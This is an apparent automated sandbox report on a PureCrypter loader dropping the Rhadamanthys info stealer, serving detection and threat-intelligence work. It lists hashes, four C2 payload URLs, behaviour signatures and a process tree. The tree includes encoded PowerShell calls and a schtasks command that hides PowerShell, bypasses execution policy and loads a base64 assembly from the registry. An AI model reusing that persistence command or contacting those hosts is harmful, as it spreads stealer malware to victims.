Analysis

  • max time kernel
    144s
  • max time network
    139s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20221111-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
  • submitted
    15-02-2023 20:42

General

  • Target

    c5f6cf32d9df0a56c7d66679b0c9f92d83e3f72bd7ff381aa58017b7eb478d9c.exe

  • Size

    6KB

  • MD5

    87cc744ba0415d7bf876f8a757d71579

  • SHA1

    a244571fc128820b1c98be6931b60363c804206a

  • SHA256

    c5f6cf32d9df0a56c7d66679b0c9f92d83e3f72bd7ff381aa58017b7eb478d9c

  • SHA512

    fb5a3af854390e9f3e8b89436f94bb310caa5d410ea78c26cbfcd6be2f2c6b69b85b862e59dc2335951b1ee2aaaa22f8095c24093201a900972c32cb4c6d3903

  • SSDEEP

    96:nmTGjilvkQHL0dKLAiU+7VJS1Ektt593ozNt:nmiiPr0QLArGqt9q

Malware Config

Extracted

Family

purecrypter

C2

http://cleaning.homesecuritypc.com/packages/Tncaifoffyw.png

http://cleaning.homesecuritypc.com/packages/Scjulanr.dll

http://cleaning.homesecuritypc.com/packages/Mumjjansinx.dat

http://cleaning.homesecuritypc.com/packages/Ivcfllg.png

Signatures

  • Detect rhadamanthys stealer shellcode 2 IoCs
  • PureCrypter

    PureCrypter is a .NET malware loader first seen in early 2021.

  • Rhadamanthys

    Rhadamanthys is an info stealer written in C++ first seen in August 2022.

  • Checks computer location settings 2 TTPs 5 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Accesses Microsoft Outlook profiles 1 TTPs 6 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 16 IoCs
  • Suspicious use of AdjustPrivilegeToken 11 IoCs
  • Suspicious use of WriteProcessMemory 32 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\c5f6cf32d9df0a56c7d66679b0c9f92d83e3f72bd7ff381aa58017b7eb478d9c.exe
    "C:\Users\Admin\AppData\Local\Temp\c5f6cf32d9df0a56c7d66679b0c9f92d83e3f72bd7ff381aa58017b7eb478d9c.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of SetThreadContext
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3440
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMwA1AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1392
    • C:\Users\Admin\AppData\Local\Temp\Ltlgkmkrffhknavg.exe
      "C:\Users\Admin\AppData\Local\Temp\Ltlgkmkrffhknavg.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2860
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMwA1AA==
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4148
      • C:\Users\Admin\AppData\Local\Temp\Buioquumbncooehdwdvs.exe
        "C:\Users\Admin\AppData\Local\Temp\Buioquumbncooehdwdvs.exe"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4572
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMwA1AA==
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4032
        • C:\Users\Admin\AppData\Local\Temp\Kielihxpsfzubv.exe
          "C:\Users\Admin\AppData\Local\Temp\Kielihxpsfzubv.exe"
          4⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4188
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMwA1AA==
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1328
        • C:\Windows\System32\schtasks.exe
          "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 5 /tn Zmqtk /tr "powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -NoExit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty HKCU:\Software\Zmqtk\).Grxzut)).EntryPoint.Invoke($Null,$Null)"
          4⤵
          • Creates scheduled task(s)
          PID:2028
    • C:\Users\Admin\AppData\Local\Temp\c5f6cf32d9df0a56c7d66679b0c9f92d83e3f72bd7ff381aa58017b7eb478d9c.exe
      C:\Users\Admin\AppData\Local\Temp\c5f6cf32d9df0a56c7d66679b0c9f92d83e3f72bd7ff381aa58017b7eb478d9c.exe
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:428
      • C:\Windows\system32\dllhost.exe
        "C:\Windows\system32\dllhost.exe"
        3⤵
        • Accesses Microsoft Outlook profiles
        • Checks processor information in registry
        • Suspicious behavior: EnumeratesProcesses
        • outlook_office_path
        • outlook_win_path
        PID:1700
  • C:\Users\Admin\AppData\Roaming\Ltlgkmkrffhknavg.exe
    C:\Users\Admin\AppData\Roaming\Ltlgkmkrffhknavg.exe
    1⤵
    • Checks computer location settings
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1784
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMwA1AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2044

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Ltlgkmkrffhknavg.exe.log

    Filesize

    2KB

    MD5

    63acd62f2a1b082b053ad05aa2645157

    SHA1

    6e6747bbd1ec9011036df1817405a376abe160d2

    SHA256

    741245ec8b319757badc80d3552795b6e2879460babdad60ba8eafdca826a4ac

    SHA512

    ccd9b7d6e831619d93f068672e11c282d55cbaefdf5d91b911431edaa921fc49b1bef1760df77883f85d9cf7e26944cee888fda35fb0878d9b0e20a212dd0f9b

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

    Filesize

    2KB

    MD5

    2f57fde6b33e89a63cf0dfdd6e60a351

    SHA1

    445bf1b07223a04f8a159581a3d37d630273010f

    SHA256

    3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

    SHA512

    42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

    Filesize

    53KB

    MD5

    06ad34f9739c5159b4d92d702545bd49

    SHA1

    9152a0d4f153f3f40f7e606be75f81b582ee0c17

    SHA256

    474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba

    SHA512

    c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

    Filesize

    53KB

    MD5

    687ff3bb8a8b15736d686119a681097c

    SHA1

    18f43aa14e56d4fb158a8804f79fc3c604903991

    SHA256

    51fd45579a0bee4beabbf7aa825ccc646f907dfdf27b2fc1791fa47dc90d5aa2

    SHA512

    047b21b92e74c93f264e2547900decd295f3089b22165372c4060b76bb813ffa6f2af924974936e25a2db551ea1eec722329ae78e1fff08f6f104d041090094a

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    16KB

    MD5

    36cc532759c0552cf70cb8dad43bc089

    SHA1

    634660db8322a4757c71e5c31e16cfaa0cc93e3e

    SHA256

    01e769a5f0978bfdcc80e307f60e5551acb3533c9461f2038106513d73ba7929

    SHA512

    465e41dd524afb233bab5be4d0bb5c6f04a076c0b88ad55e62e1546cda6fe08d0cd6e959b91b124010323e53131ddb00859f3272dc8d589a02eeec0840d3bdc3

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    bb1c33a1a3bbff8ced39d26308f77211

    SHA1

    c59c693e72c74c349b245b33b907dfb4e4ba4c3a

    SHA256

    8685999934d4786f68afbe0f7ceeecd3e308fe8886cd2bc269ba7e3d43bf3c90

    SHA512

    2d07992b52f2826969a4d5549f2812fad0999d9b858ae3e56b3ded04d058dfcada1987ae3b0c2c0cbbfed4a3ac734500a89d8750dd1b85351b6efd05202669b3

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    1bad2704664b4c1a190586ec492be65f

    SHA1

    1c98e6645c66774152c184d23f7a3178ce522e7b

    SHA256

    5950586396814b38bfdbb86757839fc8c7ce3eb73577775473c29ce6be81fe3e

    SHA512

    668553c12f1e5560baba826d5c8b139d7c7e323b6aa4e3723aaca479850f898c147d63cb77d305d715044db1e75cf501d6502ca214c7ed05ded424b230893bb0

  • C:\Users\Admin\AppData\Local\Temp\Buioquumbncooehdwdvs.exe

    Filesize

    6KB

    MD5

    7cad05e8a3a5aadc0b55d6c9e55789a3

    SHA1

    348952609d401ad89d566b897ada251900ea7ea7

    SHA256

    a7903eab27e33535de3c2c0fc961a4c35ce001152374fe77500b100c92437a00

    SHA512

    097a0932c69aab67847839ea25e4eb35944cd9a3403cb2cdf434d7a0c689ba7fc356881c2e2b67c5212759b209cb28373fced12a151bf7a0cf1ee69f68522e25

  • C:\Users\Admin\AppData\Local\Temp\Buioquumbncooehdwdvs.exe

    Filesize

    6KB

    MD5

    7cad05e8a3a5aadc0b55d6c9e55789a3

    SHA1

    348952609d401ad89d566b897ada251900ea7ea7

    SHA256

    a7903eab27e33535de3c2c0fc961a4c35ce001152374fe77500b100c92437a00

    SHA512

    097a0932c69aab67847839ea25e4eb35944cd9a3403cb2cdf434d7a0c689ba7fc356881c2e2b67c5212759b209cb28373fced12a151bf7a0cf1ee69f68522e25

  • C:\Users\Admin\AppData\Local\Temp\Kielihxpsfzubv.exe

    Filesize

    6KB

    MD5

    204887dc48078b0e7eb364a08c48e00a

    SHA1

    14a7174c7fef487b5e79b170818f42b9af92e06b

    SHA256

    843b40faa8b586231eda006f1377fc5efd9058243827f297a79a29a3730b527e

    SHA512

    a528fd67d4708324c23349e7035b09995989ac4c09d42affd532e5b42ce6cbed27ad402577f465ad61330f0ba062d662885f730de3e22ac22897caaa6a854ace

  • C:\Users\Admin\AppData\Local\Temp\Kielihxpsfzubv.exe

    Filesize

    6KB

    MD5

    204887dc48078b0e7eb364a08c48e00a

    SHA1

    14a7174c7fef487b5e79b170818f42b9af92e06b

    SHA256

    843b40faa8b586231eda006f1377fc5efd9058243827f297a79a29a3730b527e

    SHA512

    a528fd67d4708324c23349e7035b09995989ac4c09d42affd532e5b42ce6cbed27ad402577f465ad61330f0ba062d662885f730de3e22ac22897caaa6a854ace

  • C:\Users\Admin\AppData\Local\Temp\Ltlgkmkrffhknavg.exe

    Filesize

    6KB

    MD5

    321c8c92d04d0c860a657564a3377549

    SHA1

    192bb4b02000c5016acc9d993a7516519578f475

    SHA256

    bed2f279d44ae850af054b09a3981d0c1d7ea055ed9989f7af5526adb9c4d63b

    SHA512

    4fb49d06a9ef971c5c7d01ab1a689a1c243cdf8e440d148ed18fef83364746500d237e101d183a62037101fe6e9409356738cfd9fd53df1aa78c3e38d38c618a

  • C:\Users\Admin\AppData\Local\Temp\Ltlgkmkrffhknavg.exe

    Filesize

    6KB

    MD5

    321c8c92d04d0c860a657564a3377549

    SHA1

    192bb4b02000c5016acc9d993a7516519578f475

    SHA256

    bed2f279d44ae850af054b09a3981d0c1d7ea055ed9989f7af5526adb9c4d63b

    SHA512

    4fb49d06a9ef971c5c7d01ab1a689a1c243cdf8e440d148ed18fef83364746500d237e101d183a62037101fe6e9409356738cfd9fd53df1aa78c3e38d38c618a

  • C:\Users\Admin\AppData\Roaming\Ltlgkmkrffhknavg.exe

    Filesize

    6KB

    MD5

    321c8c92d04d0c860a657564a3377549

    SHA1

    192bb4b02000c5016acc9d993a7516519578f475

    SHA256

    bed2f279d44ae850af054b09a3981d0c1d7ea055ed9989f7af5526adb9c4d63b

    SHA512

    4fb49d06a9ef971c5c7d01ab1a689a1c243cdf8e440d148ed18fef83364746500d237e101d183a62037101fe6e9409356738cfd9fd53df1aa78c3e38d38c618a

  • C:\Users\Admin\AppData\Roaming\Ltlgkmkrffhknavg.exe

    Filesize

    6KB

    MD5

    321c8c92d04d0c860a657564a3377549

    SHA1

    192bb4b02000c5016acc9d993a7516519578f475

    SHA256

    bed2f279d44ae850af054b09a3981d0c1d7ea055ed9989f7af5526adb9c4d63b

    SHA512

    4fb49d06a9ef971c5c7d01ab1a689a1c243cdf8e440d148ed18fef83364746500d237e101d183a62037101fe6e9409356738cfd9fd53df1aa78c3e38d38c618a

  • memory/428-170-0x0000000000DD0000-0x0000000000DEC000-memory.dmp

    Filesize

    112KB

  • memory/428-169-0x0000000000E18000-0x0000000000E31000-memory.dmp

    Filesize

    100KB

  • memory/428-150-0x0000000000400000-0x0000000000432000-memory.dmp

    Filesize

    200KB

  • memory/428-151-0x0000000000400000-0x0000000000432000-memory.dmp

    Filesize

    200KB

  • memory/428-168-0x0000000000400000-0x0000000000432000-memory.dmp

    Filesize

    200KB

  • memory/428-153-0x0000000000400000-0x0000000000432000-memory.dmp

    Filesize

    200KB

  • memory/428-163-0x0000000000DD0000-0x0000000000DEC000-memory.dmp

    Filesize

    112KB

  • memory/428-162-0x0000000000E18000-0x0000000000E31000-memory.dmp

    Filesize

    100KB

  • memory/428-160-0x0000000000400000-0x0000000000432000-memory.dmp

    Filesize

    200KB

  • memory/428-149-0x0000000000400000-0x0000000000432000-memory.dmp

    Filesize

    200KB

  • memory/1328-203-0x00007FF84F580000-0x00007FF850041000-memory.dmp

    Filesize

    10.8MB

  • memory/1328-205-0x00007FF84F580000-0x00007FF850041000-memory.dmp

    Filesize

    10.8MB

  • memory/1392-141-0x0000000006060000-0x000000000607A000-memory.dmp

    Filesize

    104KB

  • memory/1392-140-0x0000000007130000-0x00000000077AA000-memory.dmp

    Filesize

    6.5MB

  • memory/1392-139-0x0000000005B50000-0x0000000005B6E000-memory.dmp

    Filesize

    120KB

  • memory/1392-138-0x0000000005510000-0x0000000005576000-memory.dmp

    Filesize

    408KB

  • memory/1392-135-0x0000000002560000-0x0000000002596000-memory.dmp

    Filesize

    216KB

  • memory/1392-137-0x00000000054A0000-0x0000000005506000-memory.dmp

    Filesize

    408KB

  • memory/1392-136-0x0000000004E00000-0x0000000005428000-memory.dmp

    Filesize

    6.2MB

  • memory/1700-166-0x00000181E51F0000-0x00000181E51F7000-memory.dmp

    Filesize

    28KB

  • memory/1700-171-0x00007FF4499F0000-0x00007FF449AEA000-memory.dmp

    Filesize

    1000KB

  • memory/1700-167-0x00007FF4499F0000-0x00007FF449AEA000-memory.dmp

    Filesize

    1000KB

  • memory/1700-164-0x00000181E50E0000-0x00000181E50E1000-memory.dmp

    Filesize

    4KB

  • memory/1784-189-0x00007FF84F580000-0x00007FF850041000-memory.dmp

    Filesize

    10.8MB

  • memory/1784-192-0x00007FF84F580000-0x00007FF850041000-memory.dmp

    Filesize

    10.8MB

  • memory/2044-195-0x00007FF84F580000-0x00007FF850041000-memory.dmp

    Filesize

    10.8MB

  • memory/2044-208-0x00007FF84F580000-0x00007FF850041000-memory.dmp

    Filesize

    10.8MB

  • memory/2044-191-0x00007FF84F580000-0x00007FF850041000-memory.dmp

    Filesize

    10.8MB

  • memory/2860-148-0x0000023DABD90000-0x0000023DABD96000-memory.dmp

    Filesize

    24KB

  • memory/2860-152-0x00007FF84F580000-0x00007FF850041000-memory.dmp

    Filesize

    10.8MB

  • memory/2860-159-0x00007FF84F580000-0x00007FF850041000-memory.dmp

    Filesize

    10.8MB

  • memory/2860-154-0x0000023DC6FB0000-0x0000023DC6FD2000-memory.dmp

    Filesize

    136KB

  • memory/2860-188-0x00007FF84F580000-0x00007FF850041000-memory.dmp

    Filesize

    10.8MB

  • memory/3440-133-0x0000000006570000-0x0000000006592000-memory.dmp

    Filesize

    136KB

  • memory/3440-143-0x0000000007270000-0x0000000007814000-memory.dmp

    Filesize

    5.6MB

  • memory/3440-132-0x0000000000790000-0x0000000000798000-memory.dmp

    Filesize

    32KB

  • memory/3440-142-0x00000000069F0000-0x0000000006A82000-memory.dmp

    Filesize

    584KB

  • memory/4032-184-0x00007FF84F580000-0x00007FF850041000-memory.dmp

    Filesize

    10.8MB

  • memory/4032-182-0x00007FF84F580000-0x00007FF850041000-memory.dmp

    Filesize

    10.8MB

  • memory/4032-193-0x00007FF84F580000-0x00007FF850041000-memory.dmp

    Filesize

    10.8MB

  • memory/4148-161-0x00007FF84F580000-0x00007FF850041000-memory.dmp

    Filesize

    10.8MB

  • memory/4148-158-0x00007FF84F580000-0x00007FF850041000-memory.dmp

    Filesize

    10.8MB

  • memory/4148-172-0x00007FF84F580000-0x00007FF850041000-memory.dmp

    Filesize

    10.8MB

  • memory/4188-198-0x000001FA98650000-0x000001FA98656000-memory.dmp

    Filesize

    24KB

  • memory/4188-199-0x00007FF84F580000-0x00007FF850041000-memory.dmp

    Filesize

    10.8MB

  • memory/4188-204-0x00007FF84F580000-0x00007FF850041000-memory.dmp

    Filesize

    10.8MB

  • memory/4572-200-0x0000029B66480000-0x0000029B664A6000-memory.dmp

    Filesize

    152KB

  • memory/4572-183-0x00007FF84F580000-0x00007FF850041000-memory.dmp

    Filesize

    10.8MB

  • memory/4572-176-0x0000029B4AAC0000-0x0000029B4AAC6000-memory.dmp

    Filesize

    24KB

  • memory/4572-207-0x00007FF84F580000-0x00007FF850041000-memory.dmp

    Filesize

    10.8MB

  • memory/4572-177-0x00007FF84F580000-0x00007FF850041000-memory.dmp

    Filesize

    10.8MB